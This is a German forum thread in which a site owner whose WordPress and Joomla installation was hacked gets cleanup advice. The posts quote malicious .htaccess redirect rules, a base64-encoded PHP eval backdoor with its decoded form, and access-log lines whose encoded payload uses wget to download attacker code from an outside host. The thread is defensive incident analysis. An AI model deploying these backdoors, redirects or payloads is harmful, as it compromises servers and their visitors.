Jemand setzt mir .htaccess-Dateien

  • Hallo!

    Vorgestern waren auf meinen Blogs die Bilder verschwunden.
    Als ich auf dem Server nachguckte, sah ich, dass jemand alle Verzeichnisse unter .../wp-content/uploads mit .htaccess-Dateien verkleistert hatte.
    Ich habe sie mühsam einzeln gelöscht. Die Bilder waren daraufhin wieder da.

    Nur habe ich bisher keine Lösung gefunden, wie ich das künftig verhindern kann.
    (Von all-inklusive habe ich leider noch keine nützliche Antwort.)

    Also waren die Verzeichnisse heute prompt wieder zugekleistert.

    Folgende Inhalte

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://cheap-eom-software.com/%25%7BREMOTE_ADDR}

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^http://
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . http://fundamericanow.com/r/404.php?%25%7BREMOTE_ADDR}

    Ich denke mal, das geht jetzt jeden Tag so weiter.

    Meine Fragen:

    1) Was bezwecken diese Dateien?
    2) Wie wehre ich mich gegen so etwas?

    Kann jemand helfen?
    Besten Dank!
    Bluray

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo,

    deine Installation hat eine Sicherheitslücke. D.h. fremde können auf deinem Server Dateien erstellen und vermutlich auch ändern. Der Angreifer hat vermutlich eine Stelle über die er Dateien auf dem Server ablegen kann.

    Durch Auswertung von Log-Files kann man - muss man diese Lücke suchen und beseitigen.

    Bis du die Lücke gefunden hast - hier kannst du auch Dienstleister dir suchen (winke winke) die die Lücke suchen und beseitigen... In der Zeit
    kannst du fertige - sinnhafte .htacess Dateien dir erstellen und diese in die Verzeichnisse legen. Anschliessend änderst du die RECHTE der Datei so, dass keiner die Datei mehr ändern darf sondern nur noch lesen.

    Chomd 444 = r-- r-- r--

    wenn PHP das Recht hat - über die System Steuerung die Rechte von Dateien zu ändern - funktioniert dies selbstverständlich nicht.

    Gleichzeitig solltest du deine Installation so untersuchen, dass fremde Scripte nicht mehr ausgeführt werden können.

    Beispiel. In dem Verzeichnis
    ~/wp-content/uploads/ haben fremde PHP Scripte nichts verloren und sollten auf deinem Server auch nicht ausführbar sein.

    Jetzt das unangehme. Da ein Hacker nicht nur Dateien auf dem Server erstellen kann - sondern vorhande auch ändern kann. Besteht die Möglichkeit, dass deine WP Installation per se nicht mehr sicher ist.

    Hier solltest du - meiner meinung nach - die vorhande Installation löschen und neu aussetzen.
    angefangen mit den Zugangsdaten (Datenbank, FTP) bis hin zu den PHP Dateien.

    Aber auch dies bringt keine Sicherheit, wenn du die Lüscke nicht kennst.

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • Hallo ralf!

    Danke für die Punkte. Werd ich wohl abackern müssen.
    Anscheinend funktionieren meine eigenen .htaccess-Dateien denn doch nicht so, wie sie sollten.

    Dienstleister kann ich mir nicht leisten. Leider. Hab mir aber deine Website notiert. (Sieht gut aus.) Falls ich nicht klar kommen sollte...

    Mich würde aber trotzdem noch interessieren, was genau diese Dateien machen sollen. Und warum sie -- wenn Sie machen, was sie machen sollen -- mich selbst bzw. meine Bilder aussperren. Andernfalls hätte ich doch das ewig nicht bemerkt.

    Danke erst mal!
    Bluray

  • Das sieht mir doch ganz danach aus, dass da jemand (zum Beispiel mittels eines Trojaners) deine FTP-Daten ausgespäht hat.

    Ein Ändern der Dateirechte wird somit nicht wirklich von Erfolg gekrönt werden. Besser ist es, dringend alle FTP-Accounts zu löschen und neu zu erstellen, oder die Passwörter der/des FTP-Accounts zu ändern. Dies ist die erste Maßnahme (am besten von einem anderen Rechner aus).

    Dann musst Du deinen Rechner auf Viren und Trojaner prüfen und das Problem damit an der Wurzel packen.


    Was die .htaccess machen ist, dass sie Traffic, der eigentlich auf eine Seite geht, auf andere Seiten umlenken. Eine typische Geschichte bei gehackten Seiten...

  • Hallo Marcus,

    danke für die Meldung. Dacht ich auch zuerst dran, aber weder Kaspersky, noch Spybot - Search & Destroy u.ä. können was finden. Laufen auch ständig bei mir.

    Ich habe was anderes festgestellt: Meine Blogs sind Unterverzeichnisse in einer Jooomla-Installation & diese war mit über 300 .htaccess-Dateien vermüllt; Wordpress hat's also nur nebenbei erwischt.

    Ich habe Joomla auf den Stand der Dinge gebracht, alle fremden .htaccess-Dateien mühselig vernichtet. (Der größte Teil in einem Piwik-Verzeichnis, das ich einfach gelöscht habe.)
    Dann noch ein Dutzend Passwörter geändert.
    Auf gut Deutsch den ganzen lieben langen Tag vertan.

    Ich tippe auf eine Sicherheits-Lücke, die irgendwie mit Joomla zu tun hat – oder "hatte", wie ich hoffe. Mehr fällt mir heute nicht mehr ein. Mal sehen, was sich die nächsten Tage tut. Den "18 Uhr-Robotertermin" der letzten beiden Tage habe ich zumindest bereits überstanden.

    Und wieder mal den festen Entschluss gefasst, mich wenigstens einmal im Monat um die Website als solche zu kümmern... Aber erst mach ich ein Voodoo-Püppchen mit vielen Nadeln drin...

    Danke nochmal für die Tipps.
    Schön' Abend!
    Bluray


  • Ich habe Joomla auf den Stand der Dinge gebracht [...]
    (Der größte Teil in einem Piwik-Verzeichnis, das ich einfach gelöscht habe.)

    http://www.exploit-db.com/

    Piwik hatte mal einen sehr bösen Fehler in fremden Quellen

    Open Flash Chart
    http://www.exploit-db.com/exploits/10532/

    In einigen Wordpress Pluigns wurde Open Flash Chart auch verwendet.

    In der o.g. Datenbank kannst du suchen, welche aktuellen Sicherheitslücken du evtl. noch auf deinem System hast.

    Hier die Liste von WP
    http://www.exploit-db.com/search/?action…ption=Wordpress

    Bei einigen WP Templates werden dynamisch wunderbare kleine Grafiken erzeugt. Die Funktion von einem "Entwickler" hat leider auch eine Sicherheitslücke. Anstelle Grafiken kann man damit auch andere Sachen auf dem Server wunderbar speichern. Solltest du soetwas verwenden, aktualisiere die Funktions Scripte vom "Entwickler"... die WebDesinger vom Template stören sich zurzeit nicht daran.


    Ich tippe auf eine Sicherheits-Lücke, die irgendwie mit Joomla zu tun hat – oder "hatte", wie ich hoffe. Mehr fällt mir heute nicht mehr ein. Mal sehen, was sich die nächsten Tage tut. Den "18 Uhr-Robotertermin" der letzten beiden Tage habe ich zumindest bereits überstanden.

    Wende dich an deinen Provider mit der Bitte, dass er auf den Server ein
    http://de.wikipedia.org/wiki/Rootkit

    prüft.


    Ich persönlich mag
    http://rkhunter.sourceforge.net/

    Hintergrundwissen
    http://www.heise.de/security/artik…ren-270198.html

    Viel Glück

    ralf

    Mit offenen Augen träumen

    Einmal editiert, zuletzt von r23 (10. Juni 2011 um 03:08)

  • Hallo ralf !

    Dank dir herzlichst! Seh schon, du hast Plan.
    Ich bin mir rauchendem Kopf am Machen. Mal sehen, was rauskommt.
    Sollte natürlich auch mal wieder was arbeiten...
    Wir seine Zeit dauern.

    Bis dann!
    Bluray


  • Ich bin mir rauchendem Kopf am Machen. Mal sehen, was rauskommt.

    In der - von mir genannten Exploit Datenbank kannst du sehen, wie ein Angriff auf deine Seite aussehen könnte.

    es sollte reichen, wenn du die Log-Files zum Angriff-Zeitpunkt dir durch suchst.

    Wenn du deine Dateien und Verzeichnisse nicht gelöscht hast (- keine gute Idee) suche nach neuen Dateien. Wer .htaccess Dateien erstellen konnte - kann auch Scripte erstellen.

    Php Scripte müssen in keinem Verzeichnis funktionieren in dem nur deine statischen Daten (java scripte, Flash Filme, Bilder, css) liegen. Schalte dort in diesen Verzeichnissen PHP aus.

    Suche in den PHP Scripten nach

    Code
    eval

    Um fremden code ausführen zu können, verwenden Script Angreifer
    in ihren Scripten in der Regel "eval" die Zeile sieht aus

    PHP
    eval(urldecode($_POST["main"]



    oder jetzt aus der Ralitätit

    PHP
    <?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZWMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZigkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?>

    dort steht

    PHP
    eval(if(isset($_GET["part"])) { if($_GET["part"]=="sec") echo "partgood"; } else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1) echo "ok11"; } else if(isset($_POST["main"])) { eval(urldecode($_POST["main"])); }

    Erst wenn du die Sicherheistlüscke in den Log-Files und Script gefunden hast - kannst du diese schließen.
    evtl. hat dein Provider ein Problem und der Angriff erfolgte nicht über deine Anwendungen.

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • Hallo ralf.

    Die Website musste ich natürlich löschen. Bei 400 Umleitungen auf Seiten, die meinen Besuchern einen Trojaner zu setzen versuchen. Und mein zweites Blog kam beim Anwählen mit der Meldung, wo man eine Datei namens "x-gzip" speichern wollte. (Da wär ich schnell meine paar Leser los.)
    Da bin ich mit 12-Stunden-Tagen -- auch ohne Spammer -- überfordert.
    Ich habe den Mist auf der Festplatte. Aber da ist natürlich die Zeit nicht mehr festzustellen. (Das wenn ich vorher gewust hätte. Wirklich logisch...)

    Ich habe aber einige Kameraden, wie du sie beschreibst (meine Seite habe ich mal mit xxx überschrieben):


    193.105.210.172 - - [31/May/2011:10:03:26 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.0" 404 1424 "http://www.xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.1" 404 1424 "-" "xpymep.exe"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error HTTP/1.0" 404 1424 "http://xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));error" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
    193.105.210.172 - - [31/May/2011:10:03:27 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));errorindex.php HTTP/1.0" 404 1424 "http://www.xxx.com/wp-content/plu…_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgLU8gaXNfaHVtYW5fY2xhc3MucGhwIGh0dHA6Ly8xNzA1MjAxMS5jei5jYy9hc2QudHh0Jyk7));errorindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"


    Aber was ich daraus schließen sollte/könnte...

    Merkwürdig ist, dass die in wp-content zugange waren; und die Wordpress-Sachen werden bei mir ja ständig upgedatet, da ich fast jeden Tag in den Blogs bin. Ich hätte eher auf Joomla getippt, wo ich schon länger nicht mehr Ordnung geschaffen habe.

    Ich muss mich hinhauen...
    Tschüs
    Blueray


  • 193.105.210.172 - - [31/May/2011:10:03:26 +0200] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(böses));error HTTP/1.0" 404

    Selbstverständlich sollte man die Log-Files lesen können -

    Verwendest du ein is-human Wp Plugin? - nö - daher antwortet dein Dein Server auf den Angriff HTTP/1.0" 404

    Man kann sich selbstverständlich mit nicht vorhanden Problemen den Tag versauen.

    Frohe Pfingsten wünscht

    ralf

    Mit offenen Augen träumen

  • Bisher ist eine geschlagene Woche versaut.
    Du hast mein letztes Posting übersehen. Folge dem Link.

    Bluray

    Einmal editiert, zuletzt von Bluray (14. Juni 2011 um 07:34)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!